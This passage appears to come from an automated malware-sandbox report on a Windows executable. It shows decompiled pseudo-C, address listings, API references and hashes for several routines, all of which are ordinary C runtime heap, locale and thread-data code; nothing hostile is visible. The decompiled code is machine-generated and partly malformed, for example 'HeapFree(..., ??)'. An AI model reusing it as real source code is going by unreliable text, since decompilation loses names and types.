                                      • Part of subcall function 00404A01: ___sbh_find_block.LIBCMT ref: 00404A2A
                                      • Part of subcall function 00404A01: ___sbh_free_block.LIBCMT ref: 00404A39
                                      • Part of subcall function 00404A01: HeapFree.KERNEL32(00000000,00000000,00417EF0), ref: 00404A69
                                      • Part of subcall function 00404A01: GetLastError.KERNEL32(?,0040ABE9,00000004,00418280,0000000C,00404CC3,00000000,0040105F,00000000,00000000,00000000,?,004044D6,00000001,00000214), ref: 00404A7A
                                    • __lock.LIBCMT ref: 00408459
                                    • ___removelocaleref.LIBCMT ref: 00408468
                                    • ___freetlocinfo.LIBCMT ref: 00408481
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: __lock$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref___sbh_find_block___sbh_free_block__amsg_exit__mtinitlocknum
                                    • String ID:
                                    • API String ID: 1907232653-0
                                    • Opcode ID: 1026b88885a06b287e6c1e8c2615c42954d29e41b6d1bf153606db06eda400f0
                                    • Instruction ID: fb4c77b3a1437f5d32c6e0b0f1ed228cda5b231b719d1a42386cce96b45616f7
                                    • Opcode Fuzzy Hash: 1026b88885a06b287e6c1e8c2615c42954d29e41b6d1bf153606db06eda400f0
                                    • Instruction Fuzzy Hash: 1111BF71601302D6DB30AFA59A0575E76949F00728F24843FF4D4BB2C1EF3CD9808A1D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004094BB Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 89%
                                    			E004094BB(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x418220);
				E00402914(__ebx, __edi, __esi);
				_t31 = E00404524(__ebx, __edx, __edi, _t35);
				_t15 =  *0x41adc0; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E004059E4(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x41acc0; // 0x2ba1a88
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x41a898;
								if(__eflags != 0) {
									_push(_t33);
									E00404A01(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x41acc0; // 0x2ba1a88
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x41acc0; // 0x2ba1a88
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00409556();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E004036C7(_t29, _t31, 0x20);
				}
				return E00402959(_t33);
			}










                                    0x004094bb
                                    0x004094bb
                                    0x004094bb
                                    0x004094bb
                                    0x004094bd
                                    0x004094c2
                                    0x004094cc
                                    0x004094ce
                                    0x004094d6
                                    0x004094f7
                                    0x004094fd
                                    0x00409501
                                    0x00409504
                                    0x00409507
                                    0x0040950d
                                    0x0040950f
                                    0x00409511
                                    0x00409514
                                    0x0040951a
                                    0x0040951c
                                    0x0040951e
                                    0x00409524
                                    0x00409526
                                    0x00409527
                                    0x0040952c
                                    0x00409524
                                    0x0040951c
                                    0x0040952d
                                    0x00409532
                                    0x00409535
                                    0x0040953b
                                    0x0040953f
                                    0x0040953f
                                    0x00409545
                                    0x0040954c
                                    0x004094de
                                    0x004094de
                                    0x004094de
                                    0x004094e3
                                    0x004094e7
                                    0x004094ec
                                    0x004094f4

                                    APIs
                                    • __getptd.LIBCMT ref: 004094C7
                                      • Part of subcall function 00404524: __getptd_noexit.LIBCMT ref: 00404527
                                      • Part of subcall function 00404524: __amsg_exit.LIBCMT ref: 00404534
                                    • __amsg_exit.LIBCMT ref: 004094E7
                                    • __lock.LIBCMT ref: 004094F7
                                    • InterlockedDecrement.KERNEL32(?), ref: 00409514
                                    • InterlockedIncrement.KERNEL32(02BA1A88), ref: 0040953F
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                    • String ID:
                                    • API String ID: 4271482742-0
                                    • Opcode ID: b78ec6976c47592fe942fc5a1131f55b9ddc1ea58cfec69e372ab96f873ae6b7
                                    • Instruction ID: a5d6b58a7fe7b7604ab65cfba7635d1fbe250dfc13d3ecf0f8a619550c5ae41e
                                    • Opcode Fuzzy Hash: b78ec6976c47592fe942fc5a1131f55b9ddc1ea58cfec69e372ab96f873ae6b7
                                    • Instruction Fuzzy Hash: 98016172A01622ABDB22EF56980579A7760BB05724F04803BE414777D2CB3CAD52DBDE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404A01 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 41%
                                    			E00404A01(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x417ef0);
				_t8 = E00402914(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E00402959(_t8);
				}
				if( *0x41bb90 != 3) {
					_push(_t23);
					L7:
					_t8 = HeapFree( *0x41b57c, 0, ??);
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E00402673(_t31);
						 *_t10 = E00402631(GetLastError());
					}
					goto L9;
				}
				E004059E4(__ebx, 4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E00409AB1(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E00409AE1();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E00404A57();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                    0x00404a01
                                    0x00404a03
                                    0x00404a08
                                    0x00404a0d
                                    0x00404a12
                                    0x00404a89
                                    0x00404a8e
                                    0x00404a8e
                                    0x00404a1b
                                    0x00404a60
                                    0x00404a61
                                    0x00404a69
                                    0x00404a6f
                                    0x00404a71
                                    0x00404a73
                                    0x00404a86
                                    0x00404a88
                                    0x00000000
                                    0x00404a71
                                    0x00404a1f
                                    0x00404a25
                                    0x00404a2a
                                    0x00404a30
                                    0x00404a35
                                    0x00404a37
                                    0x00404a38
                                    0x00404a39
                                    0x00404a3f
                                    0x00404a40
                                    0x00404a47
                                    0x00404a50
                                    0x00000000
                                    0x00404a52
                                    0x00404a52
                                    0x00000000
                                    0x00404a52

                                    APIs
                                    • __lock.LIBCMT ref: 00404A1F
                                      • Part of subcall function 004059E4: __mtinitlocknum.LIBCMT ref: 004059FA
                                      • Part of subcall function 004059E4: __amsg_exit.LIBCMT ref: 00405A06
                                      • Part of subcall function 004059E4: EnterCriticalSection.KERNEL32(00401050,00401050,?,0040ABE9,00000004,00418280,0000000C,00404CC3,00000000,0040105F,00000000,00000000,00000000,?,004044D6,00000001), ref: 00405A0E
                                    • ___sbh_find_block.LIBCMT ref: 00404A2A
                                    • ___sbh_free_block.LIBCMT ref: 00404A39
                                    • HeapFree.KERNEL32(00000000,00000000,00417EF0), ref: 00404A69
                                    • GetLastError.KERNEL32(?,0040ABE9,00000004,00418280,0000000C,00404CC3,00000000,0040105F,00000000,00000000,00000000,?,004044D6,00000001,00000214), ref: 00404A7A
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                    • String ID:
                                    • API String ID: 2714421763-0
                                    • Opcode ID: 0c880726d20f42d179665af45b4139c1daabdcdd7500ea643d86069e51a29768
                                    • Instruction ID: 80974c0d9f0f7496871da0ae5184dd5d3174539f6822239fee2ffb5ab93d0644
                                    • Opcode Fuzzy Hash: 0c880726d20f42d179665af45b4139c1daabdcdd7500ea643d86069e51a29768
                                    • Instruction Fuzzy Hash: 6B0184B5A44211AADF20ABB29C0A76F3A64AF40324F10413FF504761C1CB7C89418E9C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040B429 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E0040B429(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E00406DC0( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E0040B55A( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x840ffff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00402673(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0x75ff5003
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0x75ff5003
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0x75ff5003
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x840ffff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

















                                    0x0040b433
                                    0x0040b43a
                                    0x0040b451
                                    0x00000000
                                    0x0040b441
                                    0x0040b443
                                    0x0040b45d
                                    0x0040b462
                                    0x0040b465
                                    0x0040b468
                                    0x0040b491
                                    0x0040b498
                                    0x0040b49a
                                    0x0040b51b
                                    0x0040b52d
                                    0x0040b536
                                    0x0040b538
                                    0x0040b478
                                    0x0040b478
                                    0x0040b47b
                                    0x0040b47d
                                    0x0040b480
                                    0x0040b480
                                    0x0040b480
                                    0x0040b480
                                    0x00000000
                                    0x0040b486
                                    0x0040b4fa
                                    0x0040b4fa
                                    0x0040b4ff
                                    0x0040b505
                                    0x0040b508
                                    0x0040b50a
                                    0x0040b50d
                                    0x0040b50d
                                    0x0040b50d
                                    0x0040b50d
                                    0x00000000
                                    0x0040b511
                                    0x0040b49c
                                    0x0040b49f
                                    0x0040b49f
                                    0x0040b4a5
                                    0x0040b4a8
                                    0x0040b4cf
                                    0x0040b4d2
                                    0x0040b4d2
                                    0x0040b4d8
                                    0x00000000
                                    0x00000000
                                    0x0040b4da
                                    0x0040b4dd
                                    0x00000000
                                    0x00000000
                                    0x0040b4df
                                    0x0040b4df
                                    0x0040b4df
                                    0x0040b4e5
                                    0x0040b4e8
                                    0x0040b456
                                    0x0040b456
                                    0x0040b4f1
                                    0x00000000
                                    0x0040b4f1
                                    0x0040b4aa
                                    0x0040b4ad
                                    0x00000000
                                    0x00000000
                                    0x0040b4b1
                                    0x0040b4bf
                                    0x0040b4c2
                                    0x0040b4c8
                                    0x0040b4ca
                                    0x0040b4cd
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040b4cd
                                    0x0040b46a
                                    0x0040b46d
                                    0x0040b46f
                                    0x0040b475
                                    0x0040b475
                                    0x00000000
                                    0x0040b445
                                    0x0040b445
                                    0x0040b44a
                                    0x0040b44e
                                    0x0040b44e
                                    0x00000000
                                    0x0040b44a
                                    0x0040b443

                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040B45D
                                    • __isleadbyte_l.LIBCMT ref: 0040B491
                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,75FF5003,00BFBBEF,00000000,?,?,?,00406AD4,00000109,00BFBBEF,00000003), ref: 0040B4C2
                                    • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,00406AD4,00000109,00BFBBEF,00000003), ref: 0040B530
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: 1f28e54349cec5bb1c033626df0e302f3a113f77902872e920b984742352f7be
                                    • Instruction ID: ef6b6bcba348b14ee50b8656d973e2a87a06f9b211f1e409874f14d26840dd4a
                                    • Opcode Fuzzy Hash: 1f28e54349cec5bb1c033626df0e302f3a113f77902872e920b984742352f7be
                                    • Instruction Fuzzy Hash: 0531C231A00256EFDB10EF64C844AAE3BB5EF01314F1585BAE455AB2D2D734DE40DB9C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040AA24 Relevance: 6.0, APIs: 4, Instructions: 46memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 95%
                                    			E0040AA24(void* __ebx, void* __edx, void* __edi, long _a4) {
				void* __esi;
				void* __ebp;
				intOrPtr _t3;
				void* _t4;
				long _t5;
				void* _t9;
				long _t16;
				long _t18;

				_t14 = __edi;
				_t9 = __ebx;
				if( *0x41b57c == 0) {
					E00403C3C(__edi);
					E00403A6B(__edx, 0x1e);
					E0040371B(0xff);
				}
				_t3 =  *0x41bb90; // 0x1
				if(_t3 != 1) {
					_t16 = _a4;
					__eflags = _t3 - 3;
					if(__eflags != 0) {
						L8:
						__eflags = _t16;
						if(_t16 == 0) {
							_t16 = _t16 + 1;
							__eflags = _t16;
						}
						_t18 = _t16 + 0x0000000f & 0xfffffff0;
						__eflags = _t18;
						_t4 = HeapAlloc( *0x41b57c, 0, _t18);
					} else {
						_push(_t16);
						_t4 = E0040A9D5(_t9, _t14, _t16, __eflags);
						__eflags = _t4;
						if(_t4 == 0) {
							goto L8;
						}
					}
					return _t4;
				} else {
					_t5 = _a4;
					if(_t5 == 0) {
						_t5 = _t5 + 1;
					}
					return HeapAlloc( *0x41b57c, 0, _t5);
				}
			}











                                    0x0040aa24
                                    0x0040aa24
                                    0x0040aa30
                                    0x0040aa32
                                    0x0040aa39
                                    0x0040aa43
                                    0x0040aa49
                                    0x0040aa4a
                                    0x0040aa52
                                    0x0040aa6e
                                    0x0040aa71
                                    0x0040aa74
                                    0x0040aa81
                                    0x0040aa81
                                    0x0040aa83
                                    0x0040aa85
                                    0x0040aa85
                                    0x0040aa85
                                    0x0040aa89
                                    0x0040aa89
                                    0x0040aa95
                                    0x0040aa76
                                    0x0040aa76
                                    0x0040aa77
                                    0x0040aa7d
                                    0x0040aa7f
                                    0x00000000
                                    0x00000000
                                    0x0040aa7f
                                    0x0040aa9d
                                    0x0040aa54
                                    0x0040aa54
                                    0x0040aa59
                                    0x0040aa5b
                                    0x0040aa5b
                                    0x0040aa6c
                                    0x0040aa6c

                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 0040AA32
                                      • Part of subcall function 00403C3C: __set_error_mode.LIBCMT ref: 00403C3E
                                      • Part of subcall function 00403C3C: __set_error_mode.LIBCMT ref: 00403C4B
                                      • Part of subcall function 00403C3C: __NMSG_WRITE.LIBCMT ref: 00403C63
                                      • Part of subcall function 00403C3C: __NMSG_WRITE.LIBCMT ref: 00403C6D
                                    • __NMSG_WRITE.LIBCMT ref: 0040AA39
                                      • Part of subcall function 00403A6B: __set_error_mode.LIBCMT ref: 00403A9C
                                      • Part of subcall function 00403A6B: __set_error_mode.LIBCMT ref: 00403AAD
                                      • Part of subcall function 00403A6B: _strcpy_s.LIBCMT ref: 00403AE1
                                      • Part of subcall function 00403A6B: __invoke_watson.LIBCMT ref: 00403AF2
                                      • Part of subcall function 00403A6B: GetModuleFileNameA.KERNEL32(00000000,0041B061,00000104,0040105F,00000000,0041A010), ref: 00403B0E
                                      • Part of subcall function 00403A6B: _strcpy_s.LIBCMT ref: 00403B23
                                      • Part of subcall function 00403A6B: __invoke_watson.LIBCMT ref: 00403B36
                                      • Part of subcall function 00403A6B: _strlen.LIBCMT ref: 00403B3F
                                      • Part of subcall function 00403A6B: _strlen.LIBCMT ref: 00403B4C
                                      • Part of subcall function 00403A6B: __invoke_watson.LIBCMT ref: 00403B79
                                      • Part of subcall function 0040371B: ___crtCorExitProcess.LIBCMT ref: 00403723
                                      • Part of subcall function 0040371B: ExitProcess.KERNEL32 ref: 0040372C
                                    • HeapAlloc.KERNEL32(00000000,?), ref: 0040AA65
                                    • HeapAlloc.KERNEL32(00000000,?), ref: 0040AA95
                                      • Part of subcall function 0040A9D5: __lock.LIBCMT ref: 0040A9F2
                                      • Part of subcall function 0040A9D5: ___sbh_alloc_block.LIBCMT ref: 0040A9FD
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: __set_error_mode$__invoke_watson$AllocExitHeapProcess_strcpy_s_strlen$FileModuleName___crt___sbh_alloc_block__lock
                                    • String ID:
                                    • API String ID: 913549098-0
                                    • Opcode ID: 7215227adf185107ebd74e4b1a6088e0ad8c9fe13987090d707e925620fd9a3e
                                    • Instruction ID: 8e1f85532eec3fa035b4c53e20d0f1961da47a52c0ca438f0336346d9548bf72
                                    • Opcode Fuzzy Hash: 7215227adf185107ebd74e4b1a6088e0ad8c9fe13987090d707e925620fd9a3e
                                    • Instruction Fuzzy Hash: FDF02872B40314AADA206B25AD01BEA3B49DB44375F118037FC18F65D1C7349D50CEDE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004048A9 Relevance: 6.0, APIs: 4, Instructions: 34memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 92%
                                    			E004048A9(void* __eax, void* __esi) {
				int _t5;
				void* _t9;
				void* _t15;
				void* _t16;
				void** _t17;
				void* _t19;
				void* _t21;
				void* _t23;

				_t15 = __esi +  *((intOrPtr*)(_t19 + 0x57));
				_t9 = 0;
				_t21 =  *0x41bb68 - _t9; // 0x0
				if(_t21 > 0) {
					_push(_t15);
					_t16 =  *0x41bb6c; // 0x0
					_t17 = _t16 + 0x10;
					do {
						VirtualFree( *(_t17 - 4), 0, 0x8000);
						HeapFree( *0x41b57c, 0,  *_t17);
						_t17 =  &(_t17[5]);
						_t9 = _t9 + 1;
						_t23 = _t9 -  *0x41bb68; // 0x0
					} while (_t23 < 0);
				}
				HeapFree( *0x41b57c, 0,  *0x41bb6c);
				_t5 = HeapDestroy( *0x41b57c);
				 *0x41b57c =  *0x41b57c & 0x00000000;
				return _t5;
			}











                                    0x004048ae
                                    0x004048b2
                                    0x004048b4
                                    0x004048c1
                                    0x004048c3
                                    0x004048c4
                                    0x004048ca
                                    0x004048cd
                                    0x004048d7
                                    0x004048e7
                                    0x004048e9
                                    0x004048ec
                                    0x004048ed
                                    0x004048ed
                                    0x004048f5
                                    0x00404904
                                    0x0040490e
                                    0x00404914
                                    0x0040491b

                                    APIs
                                    • VirtualFree.KERNEL32(?,00000000,00008000,?), ref: 004048D7
                                    • HeapFree.KERNEL32(00000000,-00000010), ref: 004048E7
                                    • HeapFree.KERNEL32(00000000), ref: 00404904
                                    • HeapDestroy.KERNEL32 ref: 0040490E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: FreeHeap$DestroyVirtual
                                    • String ID:
                                    • API String ID: 765507482-0
                                    • Opcode ID: 94e3d1cb6b84a9db88f5b51c191fffd69e57cb009242dd861a0484bcb42d4e5b
                                    • Instruction ID: 750c6f7a9602a1c6cd654f4f33d2194c9b2427450128921e7ef7b965ac32307a
                                    • Opcode Fuzzy Hash: 94e3d1cb6b84a9db88f5b51c191fffd69e57cb009242dd861a0484bcb42d4e5b
                                    • Instruction Fuzzy Hash: 7EF0F976A00210EBD7119F64EC85B857B26EB48759F62C036EA01668B1C3726854DF9C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004082CD Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE
                                    Download Yara Rule
                                    C-Code - Quality: 90%
                                    			E004082CD(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr _t28;
				void* _t29;
				void* _t30;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x418178);
				E00402914(__ebx, __edi, __esi);
				_t28 = E00404524(__ebx, __edx, __edi, _t30);
				_t13 =  *0x41adc0; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E004059E4(_t22, 0xc);
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x41a888; // 0x41a7b0
					 *((intOrPtr*)(_t29 - 0x1c)) = E0040828F(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E00408337();
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00404524(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E004036C7(_t25, _t26, 0x20);
				}
				return E00402959(_t28);
			}







                                    0x004082cd
                                    0x004082cd
                                    0x004082cd
                                    0x004082cd
                                    0x004082cd
                                    0x004082cf
                                    0x004082d4
                                    0x004082de
                                    0x004082e0
                                    0x004082e8
                                    0x0040830c
                                    0x0040830e
                                    0x00408314
                                    0x00408318
                                    0x0040831b
                                    0x00408326
                                    0x00408329
                                    0x00408330
                                    0x004082ea
                                    0x004082ea
                                    0x004082ee
                                    0x00000000
                                    0x004082f0
                                    0x004082f5
                                    0x004082f5
                                    0x004082ee
                                    0x004082fa
                                    0x004082fe
                                    0x00408303
                                    0x0040830b

                                    APIs
                                    • __getptd.LIBCMT ref: 004082D9
                                      • Part of subcall function 00404524: __getptd_noexit.LIBCMT ref: 00404527
                                      • Part of subcall function 00404524: __amsg_exit.LIBCMT ref: 00404534
                                    • __getptd.LIBCMT ref: 004082F0
                                    • __amsg_exit.LIBCMT ref: 004082FE
                                    • __lock.LIBCMT ref: 0040830E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.984340288.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.984331709.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984422449.0000000000416000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 00000006.00000002.984472203.000000000041A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_lyebkz.jbxd
                                    Similarity
                                    • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                    • String ID:
                                    • API String ID: 3521780317-0
                                    • Opcode ID: 4316c1591417d6edb605f743dbb7f6ce20a63ad7a6a5d80938c7717a02a95795
                                    • Instruction ID: 95cd29299d6ef6e62668e3cb7a67235923cb1b4780c6c5770c49a711ce38b902
                                    • Opcode Fuzzy Hash: 4316c1591417d6edb605f743dbb7f6ce20a63ad7a6a5d80938c7717a02a95795
                                    • Instruction Fuzzy Hash: 27F09671941700DBDB20FB6596067597390AB41B29F10417FE980772D2CF7C9901CF5E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00412B5B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E00412B5B(void* __ecx, void* __edi, signed short _a4, signed short _a8) {
				char _v8;
				intOrPtr _t22;
				void* _t25;

				if(_a4 != 0xffff) {
					if(_a4 >= 0x100) {
						if( *0x41b720 == 0) {
							_push( *0x41a7c4);
							_push( *0x41a7b4);
							E00413EFB(0x41a890, 1,  &_a4, 1,  &_v8);
							_t25 = _t25 + 0x1c;
						}
						return E00412AD1(_a4, _a8, 0);
					} else {
						_t22 =  *0x41adcc; // 0x416e6a
						return  *(_t22 + (_a4 & 0x0000ffff) * 2) & 0x0000ffff & _a8 & 0x0000ffff;
					}
				} else {
					return 0;
				}
			}






                                    0x00412b6a
                                    0x00412b79
                                    0x00412b98
                                    0x00412b9a
                                    0x00412ba3
                                    0x00412bb7
                                    0x00412bbc
                                    0x00412bbc
                                    0x00412bd0
                                    0x00412b7b
                                    0x00412b7f
                                    0x00412b90
                                    0x00412b90
                                    0x00412b6c
                                    0x00412b6f
                                    0x00412b6f

                                    Strings
                                    Memory Dump Source
